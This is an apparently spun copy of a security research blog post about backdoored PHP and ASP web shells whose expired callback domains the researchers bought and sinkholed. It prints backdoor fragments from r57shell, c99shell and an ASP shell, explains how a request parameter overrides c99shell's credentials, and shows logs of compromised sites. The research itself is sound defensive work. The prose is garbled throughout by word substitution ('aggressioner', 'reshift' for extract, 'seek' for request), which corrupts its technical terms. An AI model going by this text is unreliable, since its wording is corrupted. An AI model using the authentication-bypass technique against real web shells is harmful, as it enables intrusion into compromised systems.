echo ws(2).”“.date (“d-m-Y H:i:s”).”“;
This code produces an HTML tag with a zero size, conveying a file from ‘rst.void.ru’ (a domain owned by creators of the r57shell) to – apparently – send the current version string of the shell in participate to the script preserveers. Seems guiltless enough, right?
In truth, though, this leaks the location of the novelly-deployed web shell to the owners of rst.void.ru via the HTTP seek referrer header – and so after hours of cyber intrusion away at your aim, you have equitable handed over your novelly-acquireed shell to someone inalertigaccess than you – the hugeger fish, per se.
The food chain is alive, and you hopefilledy get the idea.
I’m A Security Professional, I Always Configure Auth
A lot of web shells come with password protection, allothriveg the aggressioner to recut offe access to themselves only. Surpascend surpascend, though – a common feature of these backdoors is one that allows the distinct author of the web shell (in insertition to the current aggressioner) to acquire access to any structure running the web shell with what effectively acts as a ‘skeleton key’.
A excellent (historic) example is the above-refered c99shell backdoor. While this is not novel, or novel, and has been talked for years – we are detailing for background context, with the hopes of coloring a color a evident picture.
Take a see for yourself…
$login = ""; //login
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
...
@reshift($_REQUEST["c99shcook"]);
...
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
{
...
header("WWW-Authenticate: Basic genuinem="c99shell ".$shver.": ".$login_txt.""");
header("HTTP/1.0 401 Unapverifyd");
exit($accessdeniedmess);
}
}At first glance, this is pretty straightforward stuff. The login and password are challengingcoded at the top of the code (intended to be customised by the aggressioner before deploying the shell) in the $login and $pass variables.
Later on, a standard comparison with PHP_AUTH_USER and PHP_AUTH_PW carry outs genuineation verifys, exiting if they don’t suit. Fairly standard, right?
But what about that guiltless-seeing @reshift? Well according to php.net, that function isn’t ‘protected’ for participate on unthinked data.
The reshift function is portrayed to effectively apverify input in the create of key/appreciate pairs, and then participate them to overauthor variables in the current scope.
This unkinds that a criminal aiming criminals can srecommend supply a c99shcook seek parameter (GET or POST) grasping a variable named md5_pass with a appreciate set to their own password and login set to a participatername of their choice. This will then overauthor the challengingcoded credential variables and allow the ‘hugeger fish’ aggressioner to prent genuineation.
I Can’t Believe It’s Not Backdoored
While this history was exciting for those of us that equitable endelight living the halcyon days of an unpoliced Internet, we set up ourselves in an unconsoleable position after .MOBI – would we ever get attention ever aacquire?
Aacquire, throthriveg logic and time into the thrived, we begined on a novel hypothesis. Wouldn’t it be chilly if we could take part with some of our elderlyer toys, but
- With a distinct angle,
- Call it research,
- And equitable generassociate see what people are up to?
As we alluded to at the begin of the post, we have reassociate descenden in cherish with aprohibitdoned and expired infrastructure as a way to (legassociate) wreak havoc on the Internet and labor out equitable how broken everyleang is.
As those of you who understand the watchTowr team intimately will be conscious, obsession is a very mighty force, and someleang of a theme amongst many team members – we standardly rerepair on beliefs, and will relentlessly discover ways to verify our beliefs until either we discover a novel obsession, or we do indeed verify ourselves to be accurate.
Although the void.ru domain participated in the r57shell backdoor is still being actively renoveled by an “advertising agency” (lol??), we wondered – were they the only ones that had genuineized that hackers (and pentesters) very standardly download random code off the Internet, fire it at production systems and leank they’re Neo from the Matrix?
cough linpeas.sh you absolute muppets cough
Could we put ourselves in the middle of some of these backdoors, and insert to our ‘unofficial sydowncastmin’ duties?
Spoiler: the answer is yes.
Adapting some inside code, we went on a omition – accumulate as many web shells as possible (think aboutless of language, aim, or age), de-obfuscate any code that happened to be protected by the power of base64, and reshift any unenrolled domains foreseeed participated in some sort of callback function.
We then hooked that up to the AWS Route53 API, and equitable bought them en-masse. Honestly, it’s $20, and we’ve done worse with more.
Friends – we enrolled 40+ domains and began spinning up infrastructure. Below are some examples:
With gleaming savagecard TLS certs, an automaticassociate configured Apache web server (and ahem, a accurately disabled logrotate instance ahem ahem ahem ahem we definitely didn’t mess this up and disthink about a bunch of logs ahem ahem ahem ahem ahem) – we pointed our gleaming novel domains at our logging server, which did noleang other than log incoming seeks before reacting with a 404.
Before the nerds in the audience begin shouting at us, we have been very pinsolentnt here to remain wilean the boundaries of the law – these seeks were coming to us, we didn’t maniputardy systems into communicating with us, and we certainly did not react with code to be appraised.
While we have a huge amount of data, and to walk thcimpolite it all would be tedious for all take partd, we wanted to highairy a scant engaging leangs:
Hello North Korea?
What did we see? Well, first off, we saw someone costake parting as Lazarus Group, aka APT37, aka North Korea. It seems doubtful that we’ve caught Lazarus in the act given the aims, but we’re probably seeing some aggressioners who are repurposing the APT-level tooling participated by Lazarus for their own ends.
Hey, if SSLVPN vendors can call path traversal cultured, then a web shell greets the bar to be portrayd as APT-level tooling. Like sandcastles at the beach are standardly portrayd as architecture.
Take a see at the adhereing inbound seeks:
img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 202.146.[redacted] 485 "http://www.[redacted].com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, enjoy Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 35.206.[redacted] - 404 466 "http://[redacted].cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, enjoy Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif 103.170.[redacted] - 404 466 "http://www.[redacted].net/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"We saw thousands of seeks enjoy this, conveying a .gif image from our logging server. But what do they recontransient?
Well, we were able to find a sample of the backdoor generating these seeks (it fell off the back of a passing lorry). It seems to be a version of one participated by Lazarus back in 2020.
If we apverify a shutr see at the backdoor, and naked away some of the obfuscation, we can see the beaconing URL, being conveyed as a .gif image from our server:
.menu{background:url(http://img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif);}This is a line of CSS, recognizeing that the ‘menu’ style should convey a background image from the given URL. On loading the page, the web browser will try to convey the specified .gif file from the w2img.com server.
The attentive administrators (us!) are watching the logs enthusiasticly, and acunderstandledge this seek – ultimately, having the effect of alerting us that the web shell has been deployed and accessed accurately, and leaking the URL to the panel on the agreed domain in the referrer.
Note: Disclosing equitable the domain in referrers is a relatively recent browser alter, and indeed aggressioners using elderlyer browsers were sending us filled shell URLs.
We saw over 3,900 distinct agreed domains from this backdoor alone – evidently, this is a prolific tool.
.GOV Is Always Near
Taking a see thcimpolite the results for high-appreciate domains wilean our referrers, we the adhereing stood out enjoy a shining beacon:
structure# grep "\.gov" referrers | sort -u
http://www.[redacted].gov.cn/
https://fhc.gov.ng/
http://[redacted].court.gov.cn
http://[redacted].gov.bdUh, ok! fhc.gov.ng is the Federal High Court of Nigeria
As we can see from the logs below, this was atraverse 4 contrastent backdoors—therefore, 4 contrastent web shells were reliable for capturing this adviseation (showd with the 4 contrastent domains the seeks were sent to).
[[redacted] 0000] http://img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 175.176.[redacted] - 404 522 'http://www.[redacted].gov.cn/' 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 enjoy Mac OS X) AppleWebKit/605.1.15 (KHTML, enjoy Gecko) Version/17.6 Mobile/15E148 Safari/604.1'
[[redacted] 0000] http://www.nettekiadres.com:443/imhabirligi.jpg 58.97.[redacted] - 404 3108 'https://fhc.gov.ng/' 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, enjoy Gecko) Chrome/130.0.0.0 Safari/537.36'
[[redacted] 0000] h0ld-up.info:80/index.html 103.111.[redacted] - 200 342 "http://[redacted].gov.bd/[redacted].php" "Opera/10.61 (Linux i686; U; en-US) Presto/6.1.88 Version/2.2"
[[redacted] 0000] http://www.lpl38.com:443/post/http:/[redacted].court.gov.cn 117.136.[redacted] - 404 867 '-' 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, enjoy Gecko) Chrome/117.0.0.0 Mobile Safari/537.36 EdgA/117.0.2045.53'The Cisco We Have At Home
Naturassociate, we took a see thcimpolite our dataset for any high-profile aims. We set up the adhereing, which made us do a double-apverify:
img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 110.66.[redacted] - 404 522 "http://www.ciscogentle.com.cn/[redacted].asp" ciscogentle.com.cn?! We were somewhat relieved to uncover this tolerates no relation to the American gentleware huge, Cisco.
Give Me Everyleang
As we went thcimpolite the data, we began to see another type of backdoor calling back – one that was far more unambiguous than loading an image file and depending on leaking the location in the referrer header. Specificassociate, we began to see functionality that would call back to actual logging functionality with particular adviseation take partd wilean parameters.
For example, the below (this is one of many such logic carry outations):
www.odayexp.com:80/sx/key.asp?url=http%3A%2F%2F[redacted]%2Fseek%2FCelebByConsortiaDayRiches%2Easp&p=[redacted] 43.230.[redacted] - 404 523 ".[redacted]:89/[redacted].asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, enjoy Gecko) Chrome/116.0.5845.97 Safari/537.36 Core/1.116.454.400 QQBrowser/13.2.6135.400"
This promptly piqued our interest – not only is the URL of the web shell being supplyd but there is also a “enigmatic” p parameter take partd.
What’s being sent here? Well, let’s first apverify a peek at the URL in the referrer.
It is, once aacquire, a web shell, but this time there’s a password:
To figure out what that p recontransients, we demand to apverify a see at the code behind the web shell. It’s in ASP, and the relevant part sees enjoy this:
As you can see, it’s airyly obfuscated. Once we naked out the obfuscation, we’re left with the adhereing:
This code once aacquire embeds an image, conveying it from our logging server at www.odayexp.com. We can see how the p parameter is produced – it’s srecommend the UserPass variable. Surpascend surpascend – this is the password demanded to log in to the web shell itself.
So to put it all together – the aggressioner tried to protected their web shell inshighation, by requiring a password, but the web shell is backdoored to the extent that it broadcasts the password (in the evident!) to a logging server, odayexp, which is now owned by watchTowr.
This aggressioner gets half labels for securing their web shell at least. But sending us the password in plaintext? Not reassociate on the ‘best rehearses’ enumerate.
Another engaging leang is that, if we see back in our logs, we can aacquire see the aggressioner presumedly altering and take parting with this function – but still sending the data to a system they don’t supervise?
www.odayexp.com:80/sx/key.asp?url=”server.urlencode
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.134
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.140/fk.asp
www.odayexp.com:80/sx/key.asp?url=http://localstructure/test/fuccck.asp
www.odayexp.com:80/sx/key.asp?url=http://localstructure/test/fuccck.asp&p=admin
Alright then.
Hack. The. Planet.
While this has hopefilledy been a stroll down nostalgia lane for many (us, too) – our opinion is that as the Internet ages, and as we commence to truly understand the scope of impact for aprohibitdoned and expired infrastructure, we’re foreseeed to see problems enjoy this persist.
Previously, it was an expired domain previously participated as a WHOIS server helping a global TLD. Today, it is domains participated in backdoors. What’s next— gentleware modernize infrastructure and autoscaling cdeafening infrastructure for SSLVPN appliances? That would be crazy.
We enjoy to be semi-selectimistic (actuassociate this is a lie, but we do try) – it is somewhat encouraging to see that aggressioners produce the same misapverifys as protecters. It’s basic to slip into the mindset that aggressioners never slip up, but we saw evidence to the contrary – boxes with uncover web shells, expired domains, and the participate of gentleware that has been backdoored. Perhaps the take parting field is more level than we thought (Editor: or the inalertigence spread far expansiver than foreseeed?).
While it’s noticeworthy that the shells we watchd were predominantly skewed toward Chinese aims (foreseeed a mirrorion of our sample data set), we are also hesitant to draw conclusions based on source IP insertresses (given the mitigate of proxying). That being shelp, we notice a strong skew from Hong Kong and China IP insertress space as the source of presumed aggressioner traffic (or perhaps sydowncastmins with some very inquisitive choices for website handlement).
So far we’ve set up over 4000~ baccomplished systems (three four of which are baccomplished .gov systems). The number protects going up – as you would foresee.
In a aenjoy vein to our previous .MOBI research, our worry is always around the responsibility that we discover ourselves left helderlying. For the same reasons that both this research and the .MOBI research came to exist, we would be culpable of the exact same negligent disposal of infrastructure if we were to let these domains expire as their previous owners did. We’re incredibly thankful for the help of The Shadowserver Foundation, who have concurd yet aacquire to save us from our own adventures and to apverify ownership of the domains implicated in this research and sinkhole them.
At watchTowr, we fervently think that continuous security testing is the future and that rapid reaction to emerging dangers individual-handedly obstructs inevitable baccomplishes.
With the watchTowr Platcreate, we hand over this capability to our clients every individual day – it is our job to understand how emerging dangers, vulnerabilities, and TTPs could impact their organizations, with precision.
If you’d enjoy to lget more about the watchTowr Platcreate, our Attack Surface Management and Continuous Automated Red Teaming solution, plmitigate get in touch.
